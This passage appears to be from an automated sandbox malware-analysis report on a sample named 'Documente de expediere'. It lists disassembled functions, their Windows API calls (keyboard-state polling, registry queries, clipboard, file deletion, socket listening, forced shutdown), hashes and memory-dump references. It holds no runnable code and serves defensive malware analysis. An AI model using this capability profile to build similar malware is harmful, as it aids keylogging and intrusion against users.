                                                • Instruction ID: b247469240b8b6f4c0682eca05df05664e94d08d9bc67ad43bfec5faac61bdf9
                                                • Opcode Fuzzy Hash: 4d9f96ef544a9944823b02a6bd31e225b48503c3bf15859c49b37ee5960dd442
                                                • Instruction Fuzzy Hash: 90616D71901259EFDF00DFA5DC44AEEBBBAFF04700F148169F819AB291DB359A05CB64
                                                Function 006A6843 Relevance: 20.9, Strings: 16, Instructions: 883COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oaj$PJs$UCP)$UTF)$UTF16)
                                                • API String ID: 0-3081091665
                                                • Opcode ID: 2435cf620dca98504671356765a891283638d24433be0670453901ccc70a43e5
                                                • Instruction ID: ec6b9825bc8de4128a93ff497837bd8dd1d08aadc367f1f98e4cd32b3d89d24e
                                                • Opcode Fuzzy Hash: 2435cf620dca98504671356765a891283638d24433be0670453901ccc70a43e5
                                                • Instruction Fuzzy Hash: 17727C71E013199BDB24DF59C8907EEB7B6EF49710F14816AE849AB380EB349D81DF90
                                                Function 00710665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 007110A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00710038,?,?), ref: 007110BC
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00710737
                                                  • Part of subcall function 00699997: __itow.LIBCMT ref: 006999C2
                                                  • Part of subcall function 00699997: __swprintf.LIBCMT ref: 00699A0C
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007107D6
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0071086E
                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00710AAD
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00710ABA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                • String ID:
                                                • API String ID: 1240663315-0
                                                • Opcode ID: bd68d280a7986452a6c387822fc214312ee6654cc5e85d5530c9cd6a0210e239
                                                • Instruction ID: 53b4ebe77de6a8b45e15c337996e74599a7f2c857e21d4944a684d70be890f80
                                                • Opcode Fuzzy Hash: bd68d280a7986452a6c387822fc214312ee6654cc5e85d5530c9cd6a0210e239
                                                • Instruction Fuzzy Hash: C9E15E71204300AFCB54DF28C891E6ABBE9EF89714B04C56DF44ADB2A1DB74ED81CB95
                                                Function 006F0219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 006F0241
                                                • GetAsyncKeyState.USER32(000000A0), ref: 006F02C2
                                                • GetKeyState.USER32(000000A0), ref: 006F02DD
                                                • GetAsyncKeyState.USER32(000000A1), ref: 006F02F7
                                                • GetKeyState.USER32(000000A1), ref: 006F030C
                                                • GetAsyncKeyState.USER32(00000011), ref: 006F0324
                                                • GetKeyState.USER32(00000011), ref: 006F0336
                                                • GetAsyncKeyState.USER32(00000012), ref: 006F034E
                                                • GetKeyState.USER32(00000012), ref: 006F0360
                                                • GetAsyncKeyState.USER32(0000005B), ref: 006F0378
                                                • GetKeyState.USER32(0000005B), ref: 006F038A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                • Opcode ID: 86343024c0a7391012dd956dbae1bc1ca0fd851c81d8b13f15d5cf5aef45615b
                                                • Instruction ID: da7029e0145f02caa3f2a7d3fa1d62f29647d81acdb0dcb8650660c56b7f96d3
                                                • Opcode Fuzzy Hash: 86343024c0a7391012dd956dbae1bc1ca0fd851c81d8b13f15d5cf5aef45615b
                                                • Instruction Fuzzy Hash: DF4188355047CF6EFF319A6488083F5BEA26F12344F58809EDBC6463C3EB955AD487A2
                                                Function 00704458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                • String ID:
                                                • API String ID: 1737998785-0
                                                • Opcode ID: 59a9768b66144cc2166af5fcf0ee2405df32bc3e3d7cd7a4c222ae02c7ddd9a8
                                                • Instruction ID: 8b82c56934b917624239e5a72ec7f7d6469cf5acc3baa3fb3c65422aa9915f87
                                                • Opcode Fuzzy Hash: 59a9768b66144cc2166af5fcf0ee2405df32bc3e3d7cd7a4c222ae02c7ddd9a8
                                                • Instruction Fuzzy Hash: B0216D752012109FDB10AF69EC49BAD77A9EF14721F14C02AF94ADB2E1CB78AD01CB5C
                                                Function 006F3A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 006948AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006948A1,?,?,006937C0,?), ref: 006948CE
                                                  • Part of subcall function 006F4CD3: GetFileAttributesW.KERNEL32(?,006F3947), ref: 006F4CD4
                                                • FindFirstFileW.KERNEL32(?,?), ref: 006F3ADF
                                                • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 006F3B87
                                                • MoveFileW.KERNEL32(?,?), ref: 006F3B9A
                                                • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 006F3BB7
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 006F3BD9
                                                • FindClose.KERNEL32(00000000,?,?,?,?), ref: 006F3BF5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                • String ID: \*.*
                                                • API String ID: 4002782344-1173974218
                                                • Opcode ID: 5f43794362208e17e6d3a9d2497e2cb06eca45d5463aab76dc262d4d445af0fb
                                                • Instruction ID: 5ce252ed7cef3cd95c6cf3fd39b90b5f5fc1eafcd86143194e0fcb6f417052a8
                                                • Opcode Fuzzy Hash: 5f43794362208e17e6d3a9d2497e2cb06eca45d5463aab76dc262d4d445af0fb
                                                • Instruction Fuzzy Hash: D551813180525DAACF45EBE4CD929FDB77AAF14300F244169E40277291EF306F09CBA4
                                                Function 006A4140 Relevance: 13.4, APIs: 1, Strings: 6, Instructions: 1132COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ERCP$Oaj$VUUU$VUUU$VUUU$VUUU
                                                • API String ID: 0-2582381147
                                                • Opcode ID: 7e6eb0a3c6f1fac35ae0710e6ef871dfc9e9504b483e13360b448fd3042708ac
                                                • Instruction ID: 071253ce9d6301100e2ee15963ea26fd593aa603176431fb582701565fd348c6
                                                • Opcode Fuzzy Hash: 7e6eb0a3c6f1fac35ae0710e6ef871dfc9e9504b483e13360b448fd3042708ac
                                                • Instruction Fuzzy Hash: 5EA27E70E0421A8BDF24DF58C9907EDB7B2BF96314F1481AAD815A7380EBB49E81CF51
                                                Function 006FF65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 006FF6AB
                                                • Sleep.KERNEL32(0000000A), ref: 006FF6DB
                                                • _wcscmp.LIBCMT ref: 006FF6EF
                                                • _wcscmp.LIBCMT ref: 006FF70A
                                                • FindNextFileW.KERNEL32(?,?), ref: 006FF7A8
                                                • FindClose.KERNEL32(00000000), ref: 006FF7BE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                • String ID: *.*
                                                • API String ID: 713712311-438819550
                                                • Opcode ID: 88703d32290e0eed315686806d7406860c7c57062ee5735ee3fa1c442884ca69
                                                • Instruction ID: 4e93b458b20abb8116713a3d3ed3616226bcac1fddd76d2565ff8eb1020bfbdb
                                                • Opcode Fuzzy Hash: 88703d32290e0eed315686806d7406860c7c57062ee5735ee3fa1c442884ca69
                                                • Instruction Fuzzy Hash: DE41B37190420EAFCF51EF64DC85AEEBBB9FF05310F14456AE915A32A1EB309E44CB94
                                                Function 006A58C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 75d8ebedd73c26c1482a5c02c85060c1b24a345a8f509ce0ee04f01a1121dc6d
                                                • Instruction ID: 3497f1cf01eab63215264b0361ec5e5a6c6f64a2c880cbb9f27795b51eb45ceb
                                                • Opcode Fuzzy Hash: 75d8ebedd73c26c1482a5c02c85060c1b24a345a8f509ce0ee04f01a1121dc6d
                                                • Instruction Fuzzy Hash: 56129A70A00609EFDF14EFA5D981AEEB7BAFF49300F108169E806E7251EB35AD51CB54
                                                Function 006A5680 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 516COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 006B0FF6: std::exception::exception.LIBCMT ref: 006B102C
                                                  • Part of subcall function 006B0FF6: __CxxThrowException@8.LIBCMT ref: 006B1041
                                                • _memmove.LIBCMT ref: 006E062F
                                                • _memmove.LIBCMT ref: 006E0744
                                                • _memmove.LIBCMT ref: 006E07EB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                • String ID: yZj
                                                • API String ID: 1300846289-1230157653
                                                • Opcode ID: 3582f3c38ba951e32fb718575203ca053314e97f311ff948599e29274ac3ebf5
                                                • Instruction ID: 99e9da9086d6cc5cb4730f77e5654f63947d7d7af3adb4b73f6dd1e089d3acd0
                                                • Opcode Fuzzy Hash: 3582f3c38ba951e32fb718575203ca053314e97f311ff948599e29274ac3ebf5
                                                • Instruction Fuzzy Hash: 7C02EFB0A01209DFDF04EF65D981AAEBBB6EF45300F1480A9E806DB355EB34DD91CB95
                                                Function 006F545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 006E8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006E8D0D
                                                  • Part of subcall function 006E8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006E8D3A
                                                  • Part of subcall function 006E8CC3: GetLastError.KERNEL32 ref: 006E8D47
                                                • ExitWindowsEx.USER32(?,00000000), ref: 006F549B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                • String ID: $@$SeShutdownPrivilege
                                                • API String ID: 2234035333-194228
                                                • Opcode ID: 3194a206b811e2f1e302e1b761adb24d51e9a6e1ef2f519cad937c6ef2b23698
                                                • Instruction ID: 49c7e03e652fbdd4eb5c63ee59959d46b5f4f04a09746ff6042b51e5b8326cc8
                                                • Opcode Fuzzy Hash: 3194a206b811e2f1e302e1b761adb24d51e9a6e1ef2f519cad937c6ef2b23698
                                                • Instruction Fuzzy Hash: 6C014731655F196EE7286678DC4ABFA72DAEB05743F204034FF0BD21D3DA540C818194
                                                Function 006A3190 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __itow__swprintf
                                                • String ID: Oaj
                                                • API String ID: 674341424-1426506063
                                                • Opcode ID: f27497298da3600128fcc9e5fe5a2a55218577a351c16450d03e37744507312a
                                                • Instruction ID: 29b534a42be0d61ce1cf418194ebfaf83ad6e54c8a5cb42e18681bed7bd1bf6d
                                                • Opcode Fuzzy Hash: f27497298da3600128fcc9e5fe5a2a55218577a351c16450d03e37744507312a
                                                • Instruction Fuzzy Hash: 62229C719083519FCB64EF18C881BAEB7E6AF85300F14491DF89697391EB31EE05CB96
                                                Function 00706596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007065EF
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007065FE
                                                • bind.WSOCK32(00000000,?,00000010), ref: 0070661A
                                                • listen.WSOCK32(00000000,00000005), ref: 00706629
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00706643
                                                • closesocket.WSOCK32(00000000,00000000), ref: 00706657
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                • String ID:
                                                • API String ID: 1279440585-0
                                                • Opcode ID: a8357d2eff28d7aef7a459a7d29b320253fa7a49f18f328b629e1b422f2ee467
                                                • Instruction ID: fee3730acd94984ea70c347be21fb9342a18efa6252cc4d71a57090934e537e6
                                                • Opcode Fuzzy Hash: a8357d2eff28d7aef7a459a7d29b320253fa7a49f18f328b629e1b422f2ee467
                                                • Instruction Fuzzy Hash: F7219E30600200DFCB10EF68CC55A6EB7E9EF45320F14826DF956A73D1CB74AD118B69
                                                Function 00691287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 006919FA
                                                • GetSysColor.USER32(0000000F), ref: 00691A4E
                                                • SetBkColor.GDI32(?,00000000), ref: 00691A61
                                                  • Part of subcall function 00691290: DefDlgProcW.USER32(?,00000020,?), ref: 006912D8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ColorProc$LongWindow
                                                • String ID:
                                                • API String ID: 3744519093-0
                                                • Opcode ID: adc1fc12ca2b961b42242041246e06344397862e51567b87914be644cd9fa6cc
                                                • Instruction ID: cfb0ee84d2155a4652009364c3cbf6eb1bcbe94ebde611da66a961d7c382a23a
                                                • Opcode Fuzzy Hash: adc1fc12ca2b961b42242041246e06344397862e51567b87914be644cd9fa6cc
                                                • Instruction Fuzzy Hash: 41A13870105546BAEF28AB294C5AEFF359FDB43341F34411EF402DEAD1CE289D4292B9
                                                Function 00706A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 007080A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007080CB
                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00706AB1
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00706ADA
                                                • bind.WSOCK32(00000000,?,00000010), ref: 00706B13
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00706B20
                                                • closesocket.WSOCK32(00000000,00000000), ref: 00706B34
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                • String ID:
                                                • API String ID: 99427753-0
                                                • Opcode ID: 83e3ae0899743d37d1a10e937efada769dbe552cd8b54890fd5071bae6166c4d
                                                • Instruction ID: 9a864a6c2bff600e8285049089bf9a11430d1e72f0fb69345f29c9fa1b47e50a
                                                • Opcode Fuzzy Hash: 83e3ae0899743d37d1a10e937efada769dbe552cd8b54890fd5071bae6166c4d
                                                • Instruction Fuzzy Hash: 8C41B175B00210AFEF50AF28DC96F6E77EADB04720F04C15CF91AAB2D2CA749D0187A5
                                                Function 007155FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                • String ID:
                                                • API String ID: 292994002-0
                                                • Opcode ID: 8feb15d6f9c6957df4cf2b09881ef0c6ea3a44b33c554b39b5816c202041bced
                                                • Instruction ID: b6fc3edd82f75c78893642491fda53b9e3f46b460ae8926f75ca7529299b831f
                                                • Opcode Fuzzy Hash: 8feb15d6f9c6957df4cf2b09881ef0c6ea3a44b33c554b39b5816c202041bced
                                                • Instruction Fuzzy Hash: FF11C831700A109FDB151F2EDC44AAF779DEF94B61B40802DF406D72C1CB38D9418AE9
                                                Function 006FC602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 006FC69D
                                                • CoCreateInstance.OLE32(00722D6C,00000000,00000001,00722BDC,?), ref: 006FC6B5
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                • CoUninitialize.OLE32 ref: 006FC922
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CreateInitializeInstanceUninitialize_memmove
                                                • String ID: .lnk
                                                • API String ID: 2683427295-24824748
                                                • Opcode ID: a60ed6d944417dbe3287303862ad37ca2066bf9a905175c77519c34d6315fac3
                                                • Instruction ID: fe7a96145180507f0167ce160b844ee2b6845dbdd2ba9c612cae4998aea1956e
